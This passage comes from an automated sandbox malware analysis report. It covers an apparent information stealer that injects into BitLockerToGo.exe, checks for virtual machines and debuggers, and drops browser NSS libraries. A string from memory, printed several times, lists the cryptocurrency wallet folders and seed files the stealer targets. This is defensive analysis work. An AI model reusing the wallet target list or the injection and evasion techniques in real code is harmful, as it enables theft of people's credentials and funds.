                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI coverage: 9.3 %
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0275BE70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_027516D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0275F6B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_02763EA0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0275DA80
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0275E430
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02764910
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0275DE10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_027638B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_02764570
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0275ED20
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02767ED0 GetSystemInfo,wsprintfA,1_2_02767ED0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1839715866.00000000008EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareq
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64604
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64644
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64623
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-65779
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64601
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64615
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-64379
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0276B33A
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_027545C0 VirtualProtect ?,00000004,00000100,000000001_2_027545C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_02769860
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769750 mov eax, dword ptr fs:[00000030h]1_2_02769750
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02760250 strtok_s,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,strtok_s,lstrlen,memset,1_2_02760250
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0276CEEA SetUnhandledExceptionFilter,1_2_0276CEEA
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0276B33A
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0276AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0276AD48
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6C82B66C
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C82B1F7
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C9DAC62
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe PID: 2140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_02769600
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 501008Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2751000Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 276E000Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 277B000Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29AC000Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C82B341 cpuid 1_2_6C82B341
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_02767B90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02768B60 GetSystemTime,1_2_02768B60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02767850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_02767850
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02767A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_02767A30

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia 